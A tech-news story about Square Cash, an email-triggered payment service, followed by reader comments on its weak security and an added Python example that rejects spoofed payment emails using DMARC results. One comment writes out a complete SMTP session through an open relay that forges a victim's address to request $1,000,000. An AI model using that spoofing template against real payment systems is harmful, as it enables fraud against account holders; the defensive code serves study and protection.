Square Debuts New Email Payment System
cagraham writes "Mobile payment company Square — best known for their smartphone credit-card swipers — has launched a new payment service called Square Cash. The service doesn't require users to sign up or make an account. Instead, they just email the person they'd like to transfer money to (with the amount as the subject), and CC 'cash@square.com.' Square asks the sender for their debit card info, and then sends a link to the recipient, who can transfer the money into any account they want within 1-2 business days."
This has got to be the most insecure payment system ever.
Isn't this exactly the same thing as an Interac e-Transfer?
I've been sending money via email for many years this way.
MABASPLOOM!
So the From:, Subject:, To:, and Cc: headers are what make this work?
Not a bad idea, really, except that it can all be trivially spoofed, and the resulting setup/confirmation emails can be trivially intercepted and abused at will. Plus, of course, no easy drop-in encryption, and in the end it piggybacks on existing systems, so all the risks associated with them (like credit cards) will be neatly folded into the deal too.
How many times must people be hit in the head with a clue bat before they understand that this is a Bad Idea[tm]?
Time flies when you don't know what you're doing
We tried it. My co-worker sent me $15. After the initial email, we both tied our debit cards to our email addresses, and I had the funds in my account in less than 5 minutes. Since our cards are now linked I imagine it will be even quicker in the future.
telnet random.openmailrelay.com 25
HELO victim.domain.com
MAIL FROM: victim.email@victim.domain.com
RCPT TO: dummy.prepaid.card.email@badguy.com
DATA
CC: cash@square.com
SUBJECT: $1,000,000
Here is the payment I promised.
.
QUIT
Profit!
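A receiving-side check for the message in the comment above, as an added example that is not part of the thread and not Square's code: it trusts From: only when the service's own border MTA recorded dmarc=pass for that domain, and even then only opens a confirmation step. The authserv-id mx.example.net, the function names and the sample messages are assumptions constructed for illustration, and the border MTA is assumed to strip inbound Authentication-Results headers that carry its own id.

```python
import re
from email import message_from_string
from email.utils import getaddresses, parseaddr

SERVICE_ADDR = "cash@square.com"      # address named in the story
TRUSTED_AUTHSERV = "mx.example.net"   # assumption: authserv-id of our own border MTA
AMOUNT = re.compile(r"^\$(\d{1,3}(?:,\d{3})+|\d+)(?:\.(\d{2}))?$")

def dmarc_pass(msg, from_domain):
    """True only if our own MTA recorded dmarc=pass for the From: domain."""
    want = re.compile(r"header\.from=" + re.escape(from_domain) + r"(?![\w.-])", re.I)
    for value in msg.get_all("Authentication-Results", []):
        parts = [p.strip() for p in value.split(";")]
        head = parts[0].split()
        if not head or head[0].lower() != TRUSTED_AUTHSERV:
            continue  # stamped by some other host: the sender could have written it
        if any(re.match(r"dmarc=pass\b", p, re.I) and want.search(p) for p in parts[1:]):
            return True
    return False

def evaluate(raw):
    """Return (decision, detail) for one inbound message."""
    msg = message_from_string(raw)
    sender = parseaddr(msg.get("From", ""))[1].lower()
    cc = {addr.lower() for _, addr in getaddresses(msg.get_all("Cc", []))}
    if SERVICE_ADDR not in cc or "@" not in sender:
        return ("ignore", "not a payment request")
    m = AMOUNT.match(msg.get("Subject", "").strip())
    if not m:
        return ("reject", "subject is not an amount")
    if not dmarc_pass(msg, sender.rsplit("@", 1)[1]):
        return ("reject", "From: not authenticated")
    cents = int(m.group(1).replace(",", "")) * 100 + int(m.group(2) or 0)
    # Authenticated headers only open a request; the sender still confirms with the card.
    return ("confirm", cents)

# Constructed samples. SPOOFED mirrors the relay session above, plus a forged "pass" header.
SPOOFED = (
    "Authentication-Results: mx.example.net; spf=fail; dmarc=fail header.from=victim.domain.com\n"
    "Authentication-Results: random.openmailrelay.com; dmarc=pass header.from=victim.domain.com\n"
    "From: victim.email@victim.domain.com\nTo: dummy.prepaid.card.email@badguy.com\n"
    "Cc: cash@square.com\nSubject: $1,000,000\n\nHere is the payment I promised.\n")
GENUINE = (
    "Authentication-Results: mx.example.net; dkim=pass header.d=example.org;\n"
    "\tdmarc=pass header.from=example.org\n"
    "From: Alice <alice@example.org>\nTo: bob@example.com\n"
    "Cc: cash@square.com\nSubject: $15\n\nLunch.\n")

if __name__ == "__main__":
    print(evaluate(SPOOFED), evaluate(GENUINE))
```

The forged second Authentication-Results header in the spoofed sample is ignored because it does not carry the trusted authserv-id, so the message is rejected on the verdict the receiving MTA itself recorded.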
Sounds like an easy way to do a phishing scam.